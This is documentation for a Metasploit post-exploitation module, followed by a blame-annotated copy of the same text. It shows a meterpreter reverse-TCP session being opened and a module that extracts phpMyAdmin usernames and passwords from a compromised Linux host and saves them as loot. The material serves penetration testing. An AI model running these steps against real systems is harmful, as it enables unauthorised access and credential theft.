documentation/modules/post/linux/gather/phpmyadmin_credsteal.md

## Description

This post module gathers PhpMyAdmin Creds from target Linux machine.

* https://www.phpmyadmin.net/downloads/ [Download URL]

## Verification Steps

1. Start `msfconsole`
2. Get a session
3. Do: `use post/linux/gather/phpmyadmin_credsteal`
4. Do: `set SESSION [SESSION]`
5. Do: `run`

## Scenarios

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (816260 bytes) to 192.168.37.226
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal 
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
session => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > run


PhpMyAdmin Creds Stealer!

[+] PhpMyAdmin config found!
[+] Extracting creds
[+] User: admin
[+] Password: acoolpassword
[*] Storing credentials...
[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
[*] Post module execution completed
msf5 post(linux/gather/phpmyadmin_credsteal) > 

```
Documentation 2018-08-19 23:56:00 +05:30			`## Description`

			`This post module gathers PhpMyAdmin Creds from target Linux machine.`

			`* https://www.phpmyadmin.net/downloads/ [Download URL]`

			`## Verification Steps`

			1. Start `msfconsole`
			`2. Get a session`
			3. Do: `use post/linux/gather/phpmyadmin_credsteal`
			4. Do: `set SESSION [SESSION]`
			5. Do: `run`

			`## Scenarios`

			```
modified line in scenarios output 2018-09-06 12:15:04 -05:00			`msf5 > use multi/handler`
modified doc to reflect new output 2018-09-06 12:11:14 -05:00			`msf5 exploit(multi/handler) > set lhost 192.168.37.1`
			`lhost => 192.168.37.1`
			`msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`msf5 exploit(multi/handler) > run`
Documentation 2018-08-19 23:56:00 +05:30
modified doc to reflect new output 2018-09-06 12:11:14 -05:00			`[*] Started reverse TCP handler on 192.168.37.1:4444`
			`[*] Sending stage (816260 bytes) to 192.168.37.226`
			`[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500`
Documentation 2018-08-19 23:56:00 +05:30
modified doc to reflect new output 2018-09-06 12:11:14 -05:00			`meterpreter > background`
			`[*] Backgrounding session 2...`
			`msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal`
			`msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2`
			`session => 2`
			`msf5 post(linux/gather/phpmyadmin_credsteal) > run`


			`PhpMyAdmin Creds Stealer!`
Documentation 2018-08-19 23:56:00 +05:30
modified doc to reflect new output 2018-09-06 12:11:14 -05:00			`[+] PhpMyAdmin config found!`
			`[+] Extracting creds`
			`[+] User: admin`
			`[+] Password: acoolpassword`
			`[*] Storing credentials...`
storing config file, changed regex 2018-09-07 08:13:10 -05:00			`[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt`
Documentation 2018-08-19 23:56:00 +05:30			`[*] Post module execution completed`
modified doc to reflect new output 2018-09-06 12:11:14 -05:00			`msf5 post(linux/gather/phpmyadmin_credsteal) >`

Documentation 2018-08-19 23:56:00 +05:30			```